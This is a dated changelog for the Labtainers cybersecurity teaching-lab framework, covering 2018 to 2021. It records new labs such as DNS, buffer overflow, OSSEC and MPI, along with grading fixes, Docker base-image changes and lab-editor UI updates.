  • New parallel computing lab "parallel" using MPI.

August 3, 2021

  • Add a "WAIT_FOR" configuration option to cause a container to delay parameterization until another container completes its parameterization.
  • Support for Mariadb log formats in results parsing
  • Remove support for Mac and Windows use of Docker Desktop. That product is too unstable for us to support.
  • Suppress stderr messages when the user uses built-in bash commands such as "which".
  • Bug fixes to makepack/labpack programs.

July 19, 2021

  • Add a DNS lab to introduce the DNS protocol and configuration.
  • Revised VirtualBox appliance image to start with the correct update script.
  • Split resolv.conf nameserver parameter out of the lab_gw configuration field into its own value.
  • IModule command failed if run before any labs had been started.

July 5, 2021

  • Errors in DISPLAY env variable management broke GUI applications on Docker Desktop.

July 1, 2021

  • Support Mac package installation of headless Labtainers.
  • The routing-basics lab automated assessment failed due to lack of treataslocal files
  • Correct typos and incorrect addresses in routing-basics lab, and fix automated assessment.
  • Assessment of pcapanalysis was failing.

June 10, 2021

  • All lab manual PDFs are now in the github repo
  • Convert vpnlab and vpnlab2 instructions to PDF lab manuals.

May 25, 2021

  • Add searchable keywords to each lab. See "labtainer -h" for usage.
  • Expand routing-basics lab and lab manual
  • Remove routing-basics2 lab, it is now redundant.
  • sudo on some containers failed because hostnames remove underscores, leading to mismatch with the hosts file. Fix with extra entry in the hosts file with container name sans underscore.
  • New Labpack feature to package a collection of labs, and makepack tool to create Labpacks.
  • Error check for /sbin directory when using ubuntu20 -- would be silently fatal.
  • New network-basics lab

May 5, 2021

  • Introduce a new users lab to introduce user/group management
  • Suppress AppArmor host messages in centos container syslogs

April 28, 2021

  • New base2 images lacked man pages. Used unminimize to restore them in the base image.
  • Introduce a OSSEC host-based IDS lab.

April 13, 2021

  • CyberCIEGE lab failed because X11 socket was not relocated prior to starting Wine via fixlocal.

April 9, 2021

  • New gdb-cpp tutorial lab for using GDB on a simple C++ program.
  • Floating point exceptions were revealing use of exec_wrap.sh for stdin/stdout mirroring.

April 7, 2021

  • ldap lab failed when moved to Ubuntu 20. Problem traced to the nscd cache of pwd. Move ldap to Ubuntu 20

March 23, 2021

  • Parameterizing with RANDOM did not include the upper bound.
  • Add optional step parameter to RANDOM, e.g., to ensure word boundaries.
  • db-access lab: add mysql-workbench to database computer.
  • New overrun lab to illustrate memory references beyond bounds of c data structures.
  • New printf lab to introduce memory references made by the printf function.

March 19, 2021

  • gradelab ignores makedirs errors; problem with Windows rmtree on shared folders.
  • gradelab handle spaces in student zip file names.
  • gradelab handle zip file names from Moodle, including build downloads.

March 12, 2021

  • labedit UI: Remove old wireshark image from list of base images.
  • labedit UI: Increase some font sizes.
  • grader web interface failed to display lab manuals if the manual name does not follow naming conventions.

March 11, 2021

  • labedit UI add registry setting in new global lab configuration panel.

March 10, 2021

  • labedit UI fixes to not build if syntax error in lab
  • labedit UI "Lab running" indicator fix to reflect current lab.

March 8, 2021

  • Deprecate use of HOST_HOME_XFER, all labs use directory per the labtainer.config file.
  • Add documentation comment to start.config for REGISTRY and BASE_REGISTRY

March 5, 2021

  • Error handling on gradelab web interface when missing results.
  • labedit addition of precheck, misc bug fixes.

February 26, 2021

  • The dmz-example lab had errors in routing and setup of dnsmasq on some components.

February 18, 2021

  • UI was rebuilding images because it was updating file times without cause
  • Clean up UI code to remove some redundant data copies.

February 14, 2021

  • Add local build option to UI
  • Create empty faux_init for centos6 bases.

February 11, 2021

  • Fix UI handling of editing files. Revise layout and eliminate unused fields.
  • Add ubuntu20 base2 base configuration along with ssh2, network2 and wireshark2
  • The new wireshark solves the problem of black/noise windows.
  • Map /tmp/.X11-unix to /var/tmp and create a link. Needed for ubuntu20 (was deleting /tmp?) and may fix others.

February 4, 2021

  • Add SIZE option to results artifacts
  • Simplify wireshark-intro assessment and parameterization and add PDF lab manual.
  • Provide parameter list values to pregrade.sh script as environment variables
  • enable X11 on the grader
  • Put update-designer.sh into the user's path.

January 19, 2021

  • Change management of README date/rev to update file in source repo.
  • Introduce GUI for creating/editing labs -- see labedit command.

December 21, 2020

  • The gradelab function failed when zip files were copied from a VirtualBox shared folder.
  • Update Instructor Guide to describe management of student zip files on host computers.

December 4, 2020

  • Transition distribution of tar to GitHub release artifacts
  • Eliminate separate designer tar file, use git repo tarball.
  • Testing of grader web functions for analysis of student lab artifacts
  • Clear logs from full smoketest and delete grader container in removelab command.

December 1, 2020

  • The iptables2 lab assessment relied on random ports being "unknown" to nmap.
  • Use a sync directory to delay smoketests from starting prior to lab startup.
  • Begin integrating Lab designer UI elements.

October 13, 2020

  • Headless configurations for running on Docker Desktop on Macs & Windows
  • Headless server support, cloud-config file for cloud deployments
  • Testing support for headless configurations
  • Force mynotify to wait until rc.local runs on boot
  • Improve mynotify service ability to merge output into single timestamp
  • Python3 for stopgrade script
  • SimLab now uses docker top rather than system ps

September 26, 2020

  • Clean up the stoplab scripts to ignore non-lab containers
  • Add db-access database access control lab for controlled sharing of a mysql db.

September 17, 2020

  • The macs-hash lab was unable to run Leafpad due to the X11 setting.
  • Grader logging was being redirected to the wrong log file, now captures errors from instructor.py
  • Copy instructor.log from grader to the host logs directory if there is an error.

August 28, 2020

  • Fix install script to use python3-pip and fix broken scripts: getinfo.py and pull-all.py
  • Registry logic was broken, test systems were not using the test registry, add development documentation.
  • Add juiceshop and owasp base files for OWASP-based web security labs
  • Remove unnecessary sudos from check_nets
  • Add CHECK_OK documentation directive for automated assessment
  • Change check_nets to fix iptables and routing issues if so directed.

August 12, 2020

  • Add timeout to prestop scripts
  • Add quiz and checkwork to dmz-lab
  • Restarting the dmz-lab without -r option broke routing out of the ISP.
  • Allow multiple files for time_delim results.

August 6, 2020

  • Bug in error handling when X11 socket is missing
  • Commas in quiz questions led to parse errors
  • Add quiz and checkwork to iptables2 lab

July 28, 2020

  • Add quiz support -- these are guidance quizzes, not assessment quizzes. See the designer guide.
  • Add current-state assessment for use with the checkwork command.

July 21, 2020

  • Add testsets/bin to designer's path
  • Designer guide corrections and explanations for IModule steps.
  • Add RANGE_REGEX result type for defining time ranges using regular expressions on log entries.
  • Check that X11 socket exists if it is needed when starting a lab.
  • Add base image for mysql
  • Handle mysql log timestamp formats in results parsing.

June 15, 2020

  • New base image containing the Bird open source router
  • Add bird-bgp Border Gateway Protocol lab.
  • Add bird-ospf Open Shortest Path First routing protocol.
  • Improve handling of DNS changes, external access from some containers was blocked in some sites.
  • Add section to Instructor Guide on using Labtainers in environments lacking Internet access.

May 21, 2020

  • Move all repositories to the Docker Hub labtainers registry
  • Support mounts defined in the start.config to allow persistent software installs
  • Change ida lab to use persistent installation of IDA -- new name is ida2
  • Add cgc lab for exploration of over 200 vulnerable services from the DARPA Cyber Grand Challenge
  • Add type_string command to SimLab
  • Add netflow lab for use of NetFlow network traffic analysis
  • Add 64-bit versions of the bufoverflow and the formatstring labs

April 9, 2020

  • Grader failed assessment of CONTAINS and FILE_REGEX conditions when wildcards were used for file selection.
  • Include hints for using hexedit in the symlab lab.
  • Add hash_equal operator and hash-goals.py to automated assessment to avoid publishing expected answers in configuration files.
  • Automated assessment for the pcap-lib lab.

April 7, 2020

  • Logs have been moved to $LABTAINER_DIR/logs
  • Other cleanup to permit rebuilds and tests using Jenkins, including use of unique temporary directories for builds
  • Move build support functions out of labutils into build.py
  • Add pcap-lib lab for PCAP library based development of traffic analysis programs

March 13, 2020

  • Add plc-traffic lab for use of GrassMarlin with traffic generated during the lab.
  • Introduce ability to add "tap" containers to collect PCAPs from selected networks.
  • Update GNS3 documentation for external access to containers, and use of dummy_hcd to simulate USB drives.
  • Change kali template to use faux_init rather than attempting to use systemd.
  • Moving distributions (tar files) to box.com
  • Change SimLab use of netstat to not do a dns lookup.

February 26, 2020

  • If labtainer command does not find lab, suggest that user run update-labtainer.sh
  • Add preliminary support for a network tap component to view all network traffic.
  • Script to fetch lab images to prep VMs that will be used without internet.
  • Provide username and password for nmap-discovery lab.

February 18, 2020

  • Inherit the DISPLAY environment variable from the host (e.g., VM) instead of assuming :0

February 14, 2020

February 11, 2020

  • Update guides to describe remote access to containers within GNS3 environments
  • Hide selected components and links within GNS3.
  • Figures in the webtrack lab guide were not visible; typos in this and nmap-ssh

February 6, 2020

  • Introduce function to remotely manage containers, e.g., push files.
  • Add GNS3 environment function to simulate insertion of a USB drive.
  • Improve handling of Docker build errors.

February 3, 2020

  • On the metasploit lab, the postgresql service was not running on the victim.
  • Merge the IModule manual content into the Lab Designer guide.
  • More IModule support.

January 27, 2020

  • Introduce initial support for IModules (instructor-developed labs). See docs/imodules.pdf.
  • Fix broken LABTAINER_DIR env variable within update-labtainer
  • Fix access mode on accounting.txt file in ACL lab (had become rw-r-r). Use explicit chmod in fixlocal.sh.

January 14, 2020

  • Port framework and gradelab to Python3 (existing Python2 labs will not change)
    • Use backward compatible random.seed options
    • Hack non-compatible randint to return old values
    • Continue to support python2 for platforms that lack python3 (or those such as the older VM appliance that include python 3.5.2, which breaks random.seed compatibility).
    • Add rebuild alias for rebuild.py that will select python2 if needed.
  • Centos-based labs manpages were failing; use mandb within base docker file
  • dmz-lab netmask for DMZ network was wrong (caught by python3); as was IP address of inner gateway in lab manual
  • ghex removed from centos labs -- no longer easily supported by centos 7
  • file-deletion lab must be completed without rebooting the VM, note this in the Lab Manual.
  • Add NO_GW switch to start.config to disable default gateways on containers.
  • Metasploit lab, crashes host VM if runs as privileged; long delays on su if systemd enabled; so run without systemd. Remove use of database from lab manual, configure to use new no_gw switch
  • Update file headers for licensing/terms; add consolidated license file.
  • Modify publish.py to default to use of test registry, use -d to force use of default_registry
  • Revise source control procedures to use different test registry for each branch, and use a premaster branch for final testing of a release.

October 9, 2019

  • Remove dnsmasq from dns component in the dmz-lab. Was causing bind to fail on some installations.

October 8, 2019

  • Syntax error in test registry setup; lab designer info on large files; fetch bigexternal.txt files

September 30, 2019

  • DockerHub registry retrieval again failing for some users. Ignore html prefix to json.

September 20, 2019

  • Assessment of onewayhash should allow hmac operations on file of student's choosing.

September 5, 2019

  • Rebuild metasploit lab, metasploit-framework exhibited a bug. Also the lab's "treataslocal" file was left out of the move from svn. Fix typo in metasploit lab manual.

August 30, 2019

  • Revert test for existence of container directories, they do not always exist.

August 29, 2019

  • Lab image pulls from docker hub failed due to change in github or curl? Catch redirect to cloudflare. Addition of GNS3 support. Fix to dmz-lab dnssec.

July 11, 2019

  • Automated assessment for CentOS6 containers, fix for firefox memory issue, support arbitrary docker create arguments in the start.config file.

June 6, 2019

  • Introduce a Centos6 base, but not support for automated assessment yet

May 23, 2019

  • Automated assessment of setuid-env failed due to typos in field separators.

May 8, 2019

  • Corrections to Capabilities lab manual

May 2, 2019

  • Acl lab fix to bobstuff.txt permissions. Use explicit chmod in fixlocal.sh
  • Revise student guide to clarify use of stop and -r option in body of the manual.

March 9, 2019

  • The checkwork function was reusing containers, thereby preventing students from eliminating artifacts from previous lab work.
  • Add appendix to the symkey lab to describe the BMP image format.

February 22, 2019

  • The http server failed to start in the vpn and vpn2 labs. Automated assessment removed from those labs until reworked.

January 7, 2019

  • Fix gdblesson automated assessment to at least be operational.

January 27, 2019

  • Fix lab manual for routing-basics2 and fix routing to enable external access to internal web server.

December 29, 2018

  • Fix routing-basics2, same issues as routing-basics, plus an incorrect IP address in the gateway resolv.conf

December 5, 2018

  • Fix routing-basics lab, dns resolution at the isp and gateway components was broken.

November 14, 2018

  • Remove /run/nologin from archive machine in backups2 -- need general solution for this nologin issue

November 5, 2018

  • Change file-integrity lab default aid.conf to track metadata changes rather than file modification times

October 22, 2018

  • macs-hash lab resolution verydodgy.com failed on lab restart
  • Notify function failed if notify_cb.sh is missing

October 12, 2018

  • Set ulimit on file size, limit to 1G

October 10, 2018

  • Force collection of parameterized files
  • Explicitly include leafpad and ghex in centos-xtra baseline and rebuild dependent images.

September 28, 2018

  • Fix access modes of shared file in ACL lab
  • Clarify question in pass-crack
  • Modify artifact collection to ignore files older than start of lab.
  • Add quantum computing algorithms lab

September 12, 2018

  • Fix setuid-env grading syntax errors
  • Fix syntax error in iptables2 example firewall rules
  • Rebuild centos labs, move lamp derivatives to use lamp.xtr for waitparam and force httpd to wait for that to finish.

September 7, 2018

  • Add CyberCIEGE as a lab
  • read_pre.txt information display prior to pull of images, and chance to bail.

September 5, 2018

  • Restore sakai bulk download processing to gradelab function.
  • Remove unused instructor scripts.

September 4, 2018

  • Allow multiple IP addresses per network interface
  • Add base image for Wine
  • Add GRFICS virtual ICS simulation

August 23, 2018

  • Add GrassMarlin lab (ICS network discovery)

August 21, 2018

  • Another fix around AWS authentication issues (DockerHub uses AWS).
  • Fix new_lab_setup.py to use git instead of svn.
  • Split plc-forensics lab into a basic lab and an advanced lab (plc-forensics-adv)

August 17, 2018

  • Transition to git & GitHub as authoritative repo.

August 15, 2018

  • Modify plc-forensics lab assessment to be more general; revise lab manual to reflect wireshark on the Labtainer.

August 15, 2018

  • Add "checkwork" command allowing students to view automated assessment results for their lab work.
  • Include logging of iptables packet drops in the iptables2 and the iptables-ics lab.
  • Remove obsolete instances of is_true and is_false from goal.config
  • Fix boolean evaluation to handle "NOT foo", it had expected more operands.

August 9, 2018

  • Support parameter replacement in results.config files
  • Add TIME_DELIM result type for results.config
  • Rework the iptables lab, remove hidden nmap commands, introduce custom service

August 7, 2018

  • Add link to student guide in labtainer-student directory
  • Add link to student guide on VM desktops
  • Fixes to iptables-ics to avoid long delay on shutdown; and fixes to regression tests
  • Add note to guides suggesting student use of VM browser to transfer artifact zip file to instructor.

August 1, 2018

  • Use a generic Docker image for automated assessment; stop creating "instructor" images per lab.

July 30, 2018

  • Document need to unblock the waitparam.service (by creating flag directory) if a fixlocal.sh script is to start a service for which waitparam is a prerequisite.
  • Add plc-app lab for PLC application firewall and whitelisting exercise.

July 25, 2018

  • Add string_contains operator to goals processing
  • Modify assessment of formatstring lab to account for leaked secret not always being at the end of the displayed string.

July 24, 2018

  • Add SSH Agent lab (ssh-agent)

July 20, 2018

  • Support offline building, optionally skip all image pulling
  • Restore apt/yum repo restoration to Dockerfile templates.
  • Handle redirect URL's from Docker registry blob retrieval to avoid authentication errors (Do not rely on curl --location).

July 12, 2018

  • Add prestop feature to allow execution of designer-specified scripts on selected components prior to lab shutdown.
  • Correct host naming in the ssl lab, it was breaking automated assessment.
  • Fix dmz-lab initial state to permit DNS resolutions from inner network.
  • FILE_REGEX processing was not properly handling multiline searches.
  • Framework version derived from newly rebuilt images had incorrect default value.

July 10, 2018

  • Add an LDAP lab
  • Complete transition to systemd based Ubuntu images, remove unused files
  • Move lab_sys tar file to per-container tmp directory for concurrency.

July 6, 2018

  • All Ubuntu base images replaced with versions based on systemd
  • Labtainer container images in registry now tagged with base image ID & have labels reflecting the base image.
  • A given installation will pull and use images that are consistent with the base images it possesses.
  • If you are using a VM image, you may want to replace that with a newer VM image from our website.
  • New labs will not run without downloading newer base images; which can lead to your VM storing multiple versions of large base images (> 500 MB each).
  • Was losing artifacts from processes that were running when lab was stopped -- was not properly killing capinout processes.

June 27, 2018

  • Add support for Ubuntu systemd images
  • Remove old copy of SimLab.py from labtainer-student/bin
  • Move apt and yum sources to /var/tmp
  • Clarify differences between use of "boolean" and "count_greater" in assessments
  • Extend Add-HOST in start.config to include all components on a network.
  • Add option to new_lab_setup.py to add a container based on a copy of an existing container.

June 21, 2018

  • Set DISPLAY env for root
  • Fix to build dependency handling of svn status output
  • Add radius lab
  • Bug in SimLab append corrected
  • Use svn, where appropriate, to change file names with new_lab_setup.py

June 19, 2018

  • Retain order of containers defined in start.config when creating terminal with multiple tabs
  • Clarify designer manual to identify path to assessment configuration files.
  • Remove prompt for instructor to provide email
  • Botched error checking when testing for version number
  • Include timestamps of lab starts and redos in the assessment json
  • Add an SSL lab that includes bi-directional authentication and creation of certificates.

June 14, 2018

  • Add diagnostics to parameterizing, track down why some install seem to fail on that.
  • If a container is already created, make sure it is parameterized, otherwise bail to avoid corrupt or half-baked containers.
  • Fix program version number to use svn HEAD

June 15, 2018

  • Convert plain text instructions that appeared in xterms into pdf file.
  • Fix bug in version handling of images that have not yet been pulled.
  • Detect occurrence of a container that was created, but not parameterized, and prompt the user to restart the lab with the "-r" option.
  • Add designer utility: rm_svn.py so that removed files trigger an image rebuild.

June 13, 2018

  • Install xterm on Ubuntu 18 systems
  • Work around breakage in new versions of gnome-terminal tab handling

June 11, 2018

  • Add version checking to compare images to the framework.
  • Clarify various lab manuals

June 2, 2018

  • When installing on Ubuntu 18, use docker.io instead of docker-ce
  • The capinout caused a crash when a "sudo su" monitored command is followed by a non-elevated user command.
  • Move routing and resolv.conf settings into /etc/rc.local instead of fixlocal.sh so they persist across start/stop of the containers.

May 31, 2018

  • Work around Docker bug that caused text to wrap in a terminal without a line feed.
  • Extend COMMAND_COUNT to account for pipes
  • Create new version of backups lab that includes backups to a remote server and backs up an entire partition.
  • Alter sshlab instructions to use ssh-copy-id utility
  • Delete /run/nologin file from parameterize.sh to permit ssh login on CentOS

May 30, 2018

  • Extended new_lab_setup.py to permit identification of the base image to use
  • Create new version of centos-log that includes centralized logging.
  • Assessment validation was not accepting "time_not_during" option.
  • Begin to integrate Labtainer Master for managing Labtainers from a Docker container.

May 25, 2018

  • Remove 10 second sleeps from various services. Was delaying xinetd responses, breaking automated tests.
  • Fix snort lab grading to only require "CONFIDENTIAL" in the alarm. Remove unused files from lab.
  • Program finish times were not recorded if the program was running when the lab was stopped.

May 21, 2018

  • Fix retlibc grading to remove duplicate goal, was failing automated assessment
  • Remove copies of mynotify.py from individual labs and the lab template; it has been part of lab_sys/sbin, but had not been updated to reflect fixes made for the acl lab.

May 18, 2018

  • Mask signal message from exec_wrap so that segv error message looks right.
  • The capinout was sometimes losing stdout, check command stdout on death of cmd.
  • Fix grading of formatstring to catch segmentation fault message.
  • Add type_function feature to SimLab to type stdout of a script (see formatstring simlab).
  • Remove SimLab limitation on combining single/double quotes.
  • Add window_wait directive to SimLab to pause until window with given title can be found.
  • Modify plc lab to alter titles on physical world terminal to reflect status, this also makes testing easier.
  • Fix bufoverflow lab manual link.

May 15, 2018

  • Add appendix on use of the SimLab tool to simulate user performance of labs for regression testing and lab development.
  • Add wait_net function to SimLab to pause until selected network connections terminate.
  • Change acl automated assessment to use FILE_REGEX for multiline matching.
  • SimLab test for xsite lab.

May 11, 2018

  • Add "noskip" file to force collection of files otherwise found in home.tar, needed for retrieving Firefox places.sqlite.
  • Merge sqlite database with write ahead buffer before extracting.
  • Corrections to lab manual for the symkeylab
  • Grading additions for symkeylab and pubkey
  • Improvements to simlab tool: support include, fix window naming.

May 9, 2018

  • Fix parameterization of the file-deletion lab. Correct error its lab manual.
  • Replace use of shell=True in python scripts to reduce processes and allow tracking PIDs
  • Clean up manuals for backups, pass-crack and macs-hash.

May 8, 2018

  • Handle race condition to prevent gnome-terminal from executing its docker command before an xterm instruction terminal runs its command.
  • Don't display errors when the instructor stops a lab started with "-d".
  • Change grading of nmap-ssh to better reflect intent of the lab.
  • Several document and script fixes suggested by olberger on github.

May 7, 2018

  • Use C-based capinout program instead of the old capinout.sh to capture stdin and stdout. See trunk/src-tool/capinout. Removes limitations associated with use ctrl-C to break monitored programs and the display of passwords in telnet and ssh.
  • Include support for sakai bulk_download zip processing to extract separately submitted reports and summarize missing submissions.
  • Add checks to user-provided email to ensure they are printable characters.
  • While grading, if the user-supplied email does not match the zip file name, proceed to grade the results, but include a note in the table reflecting possible cheating. Required to recover from cases where a student enters garbage for an email address.
  • Change telnetlab grading to not look at tcpdump output for passwords -- capinout fix leads to correct character-at-a-time transmission to server.
  • Fix typo in install-docker.sh and use sudo to alter docker dns setting in that script.

April 26, 2018

  • Transition to use of "labtainer" to start lab, and "stoplab" to stop it.
  • Add --version option to labtainer command.
  • Add log_ts and log_range result types, and time_not_during goal operators. Revamp the centos-log and sys-log grading to use these features.
  • Put labsys.tar into /var/tmp instead of /tmp, sometimes would get deleted before expanded
  • Running X applications as root fails after reboot of VM.
  • Add "User Command" man pages to CentOS based labs
  • Fix recent bug that prevented collection of docs files from students
  • Modify smoke-tests to only compare student-specific result line, void of whitespace

April 20, 2018

  • The denyhosts service fails to start the first time, moved start to student_startup.sh.
  • Move all faux_init services until after parameterization -- rsyslog was failing to start on second boot of container.

April 19, 2018

  • The acl lab failed to properly assess performance of the trojan horse step.
  • Collect student documents by default.
  • The denyhost lab changed to reflect that denyhosts (or tcp wrappers?) now modifies iptables. Also, the denyhosts service was failing to start on some occasions.
  • When updating Labtainers, do not overwrite files that are newer than those in the archive -- preserve student lab reports.

April 12, 2018

  • Add documentation for the purpose of lab goals, and display this for the instructor when the instructor starts a lab.
  • Correct use of the precheck function when the program is in treataslocal; pass capinout.sh the full program path.
  • Copy instr_config files at run time rather than during image build.
  • Add Designer Guide section on debugging automated assessment.
  • Incorrect case in lab report file names.
  • Unnecessary chown function caused instructor.py to sometimes crash.
  • Support for automated testing of labs (see SimLab and smoketest).
  • Move testsets and distrib under trunk

April 5, 2018

  • Revise Firefox profile to remove the "you've not used Firefox in a while..." message.
  • Remove unnecessary pulls from registry -- get image dates via docker hub API instead.

March 28, 2018

  • Use explicit tar instead of "docker cp" for system files (Docker does not follow links.)
  • Fix backups lab use separate file system and update the manual.

March 26, 2018

  • Support for multi-user modes (see Lab Designer User Guide).
  • Removed build dependency on the lab_bin and lab_sys files. Those are now copied during parameterization of the lab.
  • Move capinout.sh to /sbin so it can be found when running as root.

March 21, 2018

  • Add CLONE to permit multiple instances of the same container, e.g., for labs shared by multiple concurrent students.
  • Adapt kali-test lab to provide example of macvlan and CLONE
  • Copy the capinout.sh script to /sbin so root can find it after a sudo su.

March 15, 2018

  • Support macvlan networks for communications with external hosts
  • Add a Kali linux base, and a Metasploitable 2 image (see kali-test)

March 8, 2018

  • Do not require labname when using stop.py
  • Catch errors caused by stray networks and advise user on a fix
  • Add support for use of local apt & yum repos at NPS

February 21, 2018

  • Add dmz-lab
  • Change "checklocal" to "precheck", reflecting it runs prior to the command.
  • Decouple inotify event reporting from use of precheck.sh, allow inotify event lists to include optional outputfile name.
  • Extend bash hook to root operations, flush that bash_history.
  • Allow parameterization of start.config fields, e.g., for random IP addresses
  • Support monitoring of services started via systemctl or /etc/init.d
  • Introduce time delimiter qualifiers to organize a timestamped log file into ranges delimited by some configuration change of interest (see dmz-lab)

February 5, 2018

  • Boolean values from results.config files are now treated as goal values
  • Add regular expression support for identifying artifact results.
  • Support for alternate Docker registries, including a local test registry for testing
  • Msc fixes to labs and lab manuals
  • The capinout monitoring hook was not killing child processes on exit.
  • Kill monitored processes before collecting artifacts
  • Add labtainer.wireshark as a baseline container, clean up dockerfiles

January 30, 2018

  • Add snort lab
  • Integrate log file timestamps, e.g., from syslogs, into timestamped results.
  • Remove undefined result values from intermediate timestamped json result files.
  • Alter the time_during goal assessment operation to associate timestamps with the resulting goal value.

January 24, 2018

  • Use of tabbed windows caused the instructor side to fail due to use of double quotes.
  • Ignore files in _tar directories (other than .tar) when determining build dependencies.


โŒ